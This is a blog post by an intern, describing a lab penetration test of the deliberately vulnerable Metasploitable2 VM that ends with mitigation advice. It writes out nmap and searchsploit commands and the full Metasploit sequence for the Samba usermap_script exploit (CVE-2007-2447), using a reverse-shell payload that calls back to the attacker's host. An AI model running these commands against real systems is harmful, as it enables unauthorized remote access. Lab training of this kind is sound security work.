DEV Community

Cover image for Hands-On Exploitation with Metasploitable2: From Scanning to Mitigation
Seif Eldien Ahmad Mohammad
Seif Eldien Ahmad Mohammad

Posted on

Hands-On Exploitation with Metasploitable2: From Scanning to Mitigation

#cybersecurity #redteaming #internship #handsonproject

Intro
During my second internship project I worked through a practical penetration testing workflow using Kali Linux and Metasploitable2. The goal: practice reconnaissance, exploitation, and writing remediation recommendations. Below I document the steps I followed and the lessons learned.

Environment

Attack box: Kali Linux

Target: Metasploitable2 (VM)

1) Recon & Scanning

I started with broad and focused scans using nmap:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
This revealed a number of services; the ones I focused on were:

  • 21/tcp → vsftpd 2.3.4 (banner only; service was broken/unresponsive)
  • 445/tcp → Samba smbd 3.x 2) Enumeration & Triage

After collecting service/version info I used searchsploit and manual checks:

searchsploit --nmap scans/target.xml
searchsploit vsftpd 2.3.4
searchsploit samba 3.0.20

This gave me candidate exploits to test. vsftpd backdoor (CVE-2011-2523) was on the list, as was the Samba username-map script exploit (CVE-2007-2447).
3) Exploitation

  • vsftpd (CVE-2011-2523): Attempted with Metasploit module exploit/unix/ftp/vsftpd_234_backdoor. The Nmap banner reported vsftpd 2.3.4, but manual connection attempts timed out and the service was not fully responsive—exploit did not yield a session.
  • Samba (CVE-2007-2447): Used Metasploit: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set RPORT 445 set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit This produced a working remote shell. 4) Post-Exploitation

With an interactive shell I validated privileges:

id
uname -a

I documented evidence (screenshots, commands, outputs) and prepared remediation notes.
5) Mitigation Summary:

  • Continuous vulnerability scanning and asset inventory.
  • Patch management — update Samba and other services.
  • Network filtering (block/limit access to ports 445, 21).
  • Disable unused services and guest/anonymous access.
  • Apply least privilege on shares and accounts.
  • Network segmentation and logging/monitoring.
  • Incident response readiness. Result: Achieved remote shell on Metasploitable2 via Samba exploit, documented findings, and produced a mitigation plan. Practically implementing scanning → exploitation → mitigation reinforced how important remediation and detection are after proving an attack path.

If anyone wants the full notes or the step-by-step commands, I can share the repo with scripts and example outputs.

Top comments (0)